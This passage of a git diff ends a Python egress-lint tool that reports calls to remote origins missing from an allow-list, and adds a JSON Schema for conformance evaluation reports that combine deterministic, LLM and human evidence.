"note": f"{v.vector} -> {v.url}"} for v in violations] + clean = not violations + detail = ( + "No unsanctioned egress vectors found; all remote origins are allow-listed." + if clean else + f"{len(violations)} unsanctioned egress vector(s) to non-allow-listed remote origin(s)." 
+ ) + print(json.dumps({ + "tool": "egress-lint", + "ac": ac, + "clean": clean, + "suggested_status": "conformant" if clean else "non-conformant", + "evidence": {"source": "deterministic", "tool": "egress-lint", "detail": detail, "citations": citations}, + }, indent=2)) + return 0 if clean else 1 + + if not violations: + print("egress-lint: OK") + print(f" scanned {target} (no unsanctioned egress; {len(allow)} allow-listed origin(s))") + return 0 + + print(f"egress-lint: {len(violations)} unsanctioned egress vector(s) found (bears on {ac}):") + for v in sorted(violations, key=lambda v: (v.path, v.line)): + print(f" - {v.path}:{v.line}: [{v.vector}] {v.url}") + print("\nIf an origin above is legitimate for this design's flavor, add it to") + print("egress-allow.json (with a reason naming the axis pick that justifies it).") + return 1 + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/tools/evaluate-report.schema.json b/tools/evaluate-report.schema.json new file mode 100644 index 0000000..a3f25ad --- /dev/null +++ b/tools/evaluate-report.schema.json @@ -0,0 +1,172 @@ +{ + "$schema": "https://json-schema.org/draft/2020-12/schema", + "$id": "https://pna-spec.example/v0.1/evaluate-report.schema.json", + "title": "PNT evaluate-report artifact", + "description": "Machine-comparable form of the report produced by the skill's evaluate flow (pna-build-eval-contrib/SKILL.md § Evaluate flow). Keyed by AC ID so two runs on the same candidate can be diffed to show exactly which ACs changed status. The human-readable report is a rendering (a view) over an instance of this schema; this artifact is the source of truth. This is NOT a PNA interface contract — it realizes no AC and intentionally lives in tools/, not contracts/ (the lint-spec-ids check requires every file in contracts/ to name an AC it realizes; this one realizes none). It is the typed output of PNT's own evaluative tooling. 
Deterministic checks in tools/ (for example the egress lint) emit evidence entries with source=deterministic that an LLM evaluator folds into the relevant AC finding alongside its own source=llm evidence; source=human covers maintainer or reviewer judgement. Goals 1-5 (see spec/PNA_Spec.md § Goals) are the load-bearing user-facing concerns and drive the summary.", + "type": "object", + "required": ["report_schema_version", "candidate", "summary", "findings"], + "additionalProperties": false, + "properties": { + "report_schema_version": { + "const": "0.1", + "description": "Version of THIS report schema (not the PNA Spec version the candidate was evaluated against — that is candidate.pna_spec_version). Lets a diff tool refuse to compare incompatible report shapes." + }, + "generated_at": { + "type": "string", + "format": "date-time", + "description": "Optional ISO 8601 timestamp the emitter stamps when the report was produced. Informational; not used for diffing." + }, + "generated_by": { + "type": "string", + "description": "Optional free-text identity of the evaluator that produced this report (agent/model/tool). Informational." + }, + "candidate": { + "type": "object", + "description": "What was evaluated. Enough to know which design + revision this report describes, so two reports over the same candidate can be diffed meaningfully.", + "required": ["pna_spec_version", "picks_source"], + "additionalProperties": false, + "properties": { + "name": { "type": "string", "description": "Human-readable design name, if known." }, + "repo_url": { "type": "string", "description": "Canonical source URL, if known." }, + "commit": { "type": "string", "description": "Commit SHA (or other revision id) of the source that was read, if known. Two reports at different commits are expected to differ; two at the same commit should not." }, + "pna_spec_version": { "type": "string", "description": "The PNA Spec version the candidate was evaluated against, e.g. '0.1'." 
}, + "picks_source": { + "enum": ["declared", "inferred"], + "description": "Whether axis_picks came from the candidate's own Architecture document (declared) or were inferred from the source by the evaluator (inferred). Per SKILL.md § Evaluate flow, both are valid inputs." + }, + "axis_picks": { + "type": "object", + "description": "The candidate's flavor: axis -> pick. Determines which flavor-derived ACs apply (see spec/axes.md). Keys are axis names (e.g. 'distribution', 'storage'); values are pick identifiers (e.g. 'web-bundle-with-magic-link').", + "additionalProperties": { "type": "string" } + } + } + }, + "summary": { + "type": "object", + "description": "Top-of-report posture. Per SKILL.md, anything compromising Goals 1-5 leads here.", + "required": ["posture", "headline"], + "additionalProperties": false, + "properties": { + "posture": { + "enum": ["conformant", "non-conformant", "mixed", "indeterminate"], + "description": "conformant = no non-conformances found and nothing left undetermined. non-conformant = at least one Goal 1-5 AC is non-conformant. mixed = some non-conformances but none on Goals 1-5, or non-conformances coexisting with conformant findings. indeterminate = too many unable-to-determine findings to take a posture." + }, + "headline": { + "type": "string", + "description": "One- or two-sentence prose summary a human reads first. Should name the most concerning non-conformances, Goals 1-5 first." + }, + "leading_concerns": { + "type": "array", + "description": "AC IDs (matching findings[].ac_id) the summary calls out as most concerning, in priority order. Typically the Goal 1-5 non-conformances.", + "items": { "$ref": "#/$defs/ac_id" } + } + } + }, + "findings": { + "type": "array", + "description": "One entry per AC the evaluator considered for the candidate's flavor. 
The diff signal: same candidate.commit + same report_schema_version should produce the same set of (ac_id -> status); a status change between two runs is the regression/improvement signal.", + "minItems": 1, + "items": { "$ref": "#/$defs/finding" } + } + }, + "$defs": { + "ac_id": { + "type": "string", + "pattern": "^AC-[A-Z0-9-]+$", + "description": "Stable AC identifier as defined in spec/PNA_Spec.md or spec/axes.md, e.g. AC-1, AC-MCP-A, AC-PRM-C." + }, + "code_location": { + "type": "object", + "required": ["path"], + "additionalProperties": false, + "properties": { + "path": { "type": "string", "description": "Repo-relative path to the cited source file." }, + "lines": { "type": "string", "description": "Optional line or range within the file, e.g. '120' or '120-145'." }, + "note": { "type": "string", "description": "Optional one-line explanation of what this location shows." } + } + }, + "evidence": { + "type": "object", + "description": "A single piece of support for a finding's status. The layering principle (deterministic + LLM + human) shows up here as the source field.", + "required": ["source", "detail"], + "additionalProperties": false, + "properties": { + "source": { + "enum": ["deterministic", "llm", "human"], + "description": "deterministic = produced by a tools/ check (e.g. the egress lint); llm = the evaluating model's own architectural reading; human = maintainer/reviewer judgement." + }, + "tool": { + "type": "string", + "description": "For source=deterministic, the producing tool's identifier, e.g. 'egress-lint'. Omitted for llm/human." + }, + "detail": { "type": "string", "description": "What this evidence shows, in prose." }, + "citations": { + "type": "array", + "description": "Optional code locations this specific evidence points at (e.g. 
the offending call site a deterministic check flagged).", + "items": { "$ref": "#/$defs/code_location" } + } + } + }, + "finding": { + "type": "object", + "required": ["ac_id", "status"], + "additionalProperties": false, + "properties": { + "ac_id": { "$ref": "#/$defs/ac_id" }, + "ac_source": { + "enum": ["universal", "flavor-derived"], + "description": "Where the AC is defined: universal (spec/PNA_Spec.md) or flavor-derived (spec/axes.md, triggered by an axis pick)." + }, + "status": { + "enum": ["conformant", "non-conformant", "not-applicable", "unable-to-determine"], + "description": "Per SKILL.md § Evaluate flow. conformant: design honors the AC. non-conformant: design violates it. not-applicable: the candidate's flavor doesn't trigger this AC. unable-to-determine: evaluator couldn't decide; flags for human review." + }, + "goals": { + "type": "array", + "description": "Which top-level Goals (1-5) this AC bears on. Used to compute summary.posture and order leading_concerns.", + "items": { "type": "integer", "minimum": 1, "maximum": 5 } + }, + "requirement": { + "type": "string", + "description": "The AC's stated normative requirement (the MUST/SHOULD text it constrains). Required when status=non-conformant so the violation is self-explaining." + }, + "rationale": { + "type": "string", + "description": "The evaluator's reasoning. Required for not-applicable (the reason it doesn't apply) and unable-to-determine (what blocked a decision)." + }, + "citations": { + "type": "array", + "description": "Code locations supporting the status. Required (non-empty) for conformant and non-conformant.", + "items": { "$ref": "#/$defs/code_location" } + }, + "evidence": { + "type": "array", + "description": "Supporting evidence entries (deterministic / llm / human). 
A deterministic tool's output lands here so deterministic and LLM layers co-locate on one AC.", + "items": { "$ref": "#/$defs/evidence" } + }, + "needs_human_review": { + "type": "boolean", + "description": "Defaults true semantically for unable-to-determine. Set explicitly when a conformant/non-conformant call still wants a human second look." + } + }, + "allOf": [ + { + "if": { "properties": { "status": { "const": "conformant" } } }, + "then": { "required": ["citations"], "properties": { "citations": { "minItems": 1 } } } + }, + { + "if": { "properties": { "status": { "const": "non-conformant" } } }, + "then": { "required": ["citations", "requirement"], "properties": { "citations": { "minItems": 1 } } } + }, + { + "if": { "properties": { "status": { "const": "not-applicable" } } }, + "then": { "required": ["rationale"] } + }, + { + "if": { "properties": { "status": { "const": "unable-to-determine" } } }, + "then": { "required": ["rationale"] } + } + ] + } + } +}